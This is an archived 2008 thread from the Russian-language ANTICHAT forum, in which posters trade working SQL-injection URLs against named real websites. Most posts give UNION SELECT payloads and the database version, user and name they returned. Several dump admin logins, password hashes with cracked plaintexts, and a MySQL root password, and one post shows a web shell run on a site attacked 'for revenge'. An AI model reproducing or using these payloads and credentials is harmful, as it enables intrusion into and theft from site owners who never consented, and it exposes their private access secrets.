ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5241  
Старый 03.04.2008, 23:44
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

http://www.ebsdublin.com/
Код:
http://www.ebsdublin.com/main.php?ID1=1&ID2=0x2d3127%20union+select+1,2,3,4,5,6,7,8,concat_ws(0x2F,version(),database(),user())/*
5.0.45-community-log/EBSDUBL_db/EBSDUBL_web@win9.hosting365.ie


http://evangelistrussellkidman.com/
Код:
http://evangelistrussellkidman.com/main.php?id1=0x2d3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user()),4/*
4.0.25/evangel_kidman/evangel_manager@localhost


http://www.e-self.co.kr/
Код:
http://www.e-self.co.kr/shop/main.php?page=view_class&class_id=0x2d3127%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12/*
4.0.26-log/ns_eself/eself@localhost
 
Ответить с цитированием

  #5242  
Старый 04.04.2008, 06:25
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://www.dknews.kz/leftlink.php?linkid=1171&archid=-1+union+select+1,concat(version(),char(58),user(), char(58),database()),3,777,5/*

4.1.22-standard
dknewsk@localhost
dknewsk_manat
 
Ответить с цитированием

  #5243  
Старый 04.04.2008, 13:57
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию

Код:
http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),4,5,6,7,8,9,10,11/*
user:wfsj@localhost
ver:4.1.7-nt-max
db:wfsj
таблицы подобрать не получилось
 
Ответить с цитированием

  #5244  
Старый 04.04.2008, 21:30
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

http://www.champleague.ru/index.php?cat=rounds&season=1&id=-99999+union+select+1,2,3,concat_ws(0x3a,id,usernam e,password),5,6,7+from+users/*

USER(): rufoot_lch@localhost
VERSION(): 4.1.22-log
DATABASE(): rufoot_lch


1:admin:admin01
где одминка хз

*****************************************

http://www.globalwaterfoundation.org/news.php?id=-99999+union+select+1,concat_ws(0x3a,user_id,user_f irst_name,user_last_name,user_username,user_passwo rd),3+from+wma_users/*

USER(): globalwater@web2.4what.net
VERSION(): 5.0.37-community-log
DATABASE(): globalwaterfoundation_org_-_1


4:4What:Interactive:4what:4what
5:Global Water:Foundation:gwf:water

*****************************************

http://www.kvn.com/attorneys_bio.php?id=-99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20/*

USER(): kvn@localhost
VERSION(): 5.0.24-community-nt
DATABASE(): kvn

Последний раз редактировалось beerhack; 04.04.2008 в 23:48..
 
Ответить с цитированием

  #5245  
Старый 05.04.2008, 03:39
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

hi-tech.mail.ru

Код:
http://hi-tech.mail.ru/?id=1027-1
http://hi-tech.mail.ru/?pr=6350-1
Использовать не получилось, никак не выходит отсечь оставшуюся часть строки

Это работает:
http://hi-tech.mail.ru/?id=1026--

А это уже нет:
http://hi-tech.mail.ru/?id=1026-- LALALA

Вариант с /* тоже не канает

Может кто знает особенности mail.ru
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 05.04.2008 в 03:44..
 
Ответить с цитированием

  #5246  
Старый 05.04.2008, 10:31
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://gis35.ru/news/?nw_id=-1+union+select+1,concat(version(),char(58),databas e(),char(58),user()),3,4,5,6,7,8,9,10--

выводится в <title>

4.1.22-standard
gis35ru_gisdb
gis35ru_gisdbuse@localhost

Таблицы подобрать не удалось(
 
Ответить с цитированием

  #5247  
Старый 05.04.2008, 17:51
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://e.kostanay.kz/?cp=7&url=-1+union+select+table_name+from+information_schema. tables/*

sega@localhost
5.0.32-Debian_7etch4-log
e-akimat

только чего-то не могу я из этих таблиц извлеч имена полей в hex пробовал тоже не получается... если кто сделает просветите

Последний раз редактировалось truelamer; 05.04.2008 в 19:11..
 
Ответить с цитированием

  #5248  
Старый 05.04.2008, 18:49
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://www.liter.kz/print.php?lan=russian&id=154&pub=-1+union+select+1,2,3,4,5,concat(version(),char(58) ,user(),char(58),database()),7,8,9,10,11,12/*

5.0.45-community-nt
liter
liter@localhost

http://www.liter.kz/print.php?lan=russian&id=154&pub=-1+union+select+1,2,3,4,5,concat(name,char(58),pass ),7,8,9,10,11,12+from+noc+limit+0,1/*

таблица с логинами и хэшами - noc
root:d150dfc27d456cbcba88a10f71800b72
dina:0bfd678c87231c95741ffb770a2a1a48
viktor:55022818aa052f54aa703a373a067de3

и.т.д.

вот что удалось расшифровать с помощью http://md5.xek.cc/index.php
root:rt1pwd
viktor:archieve


и.т.д.
 
Ответить с цитированием

  #5249  
Старый 06.04.2008, 00:31
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

хотел я зарегать домен maxster.ru,но не судьба, идет переадресация на www.100mat.ru, я решил им отомстить :\
Код:
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=-111+UNION+SELECT+1,2,concat_ws(0x3a,U_Username,U_password)+from+w3t_Users+where+/*
.:[ Stylist ]:.:.$e3XHMmHqAco - это на форум
Код:
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=-111+UNION+SELECT+1,2,concat_ws(0x3a,user,password)+from+mysql.user/*
root:vpsuG1271 - это от БД

ну и самое вкусное
Код:
http://www.100mat.ru/ubb/shell1.php?cmd=uname -a
1 2 FreeBSD mail.100mat.org.ru 5.4-RELEASE FreeBSD 5.4-RELEASE

file_priv есть, кому интересно разгребайте

Последний раз редактировалось maxster; 06.04.2008 в 01:30..
 
Ответить с цитированием

  #5250  
Старый 06.04.2008, 01:47
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

Цитата:
http://www.surroundmusic.net/smnews_detail.php?id=99999+union+select+1,2,3,4,5, 6,VERSION(),8,9,10,11,12,13,14,15,16,17,18,19,20,2 1/*
VERSION: 4.1.22-standard
USER: root@localhost
DATABASE: wsr

Цитата:
http://www.leaguestat.com/hockeycanada/rbc_cup/en/stats/player.php?id=99999+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,VERSION(),36/*
VERSION: 5.0.22-log
USER: newsport@node3.leaguestat.com
DATABASE: hockeycanada

Цитата:
http://www.americanaustralian.org/Aboutus/mediadisplay.php?Id=99999+union+select+1,VERSION() ,3,4,5,6/*
VERSION: 4.0.27-log
USER: aaanyc@localhost
DATABASE: aaanyc

Цитата:
http://www.voicemagazine.org/authors/authorfull.php?ID=99999+union+select+1,VERSION(),3 ,4/*
VERSION: 5.0.45-community
USER: ocsausu_cmsd@localhost
DATABASE: ocsausu_ausucms

Цитата:
http://www.americancurvesmag.com/goc_details.php?id=99999+union+select+1,2,3,VERSIO N(),5,6,7,8,9,10,11,12,13,14,15,16/*
VERSION: 4.1.21-community-nt
USER: dbmacmag@localhost
DATABASE: mainamericancurvesmag

Цитата:
http://www.americancastiron.com/page.php?id=99999+union+select+1,2,3,4,VERSION(),6 ,7,8,9,10,11,12,13,14,15/*
VERSION: 5.0.46-enterprise-gpl-log
USER: ameri118@216.239.136.13
DATABASE: ameri118
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
 


Быстрый переход




ANTICHAT.XYZ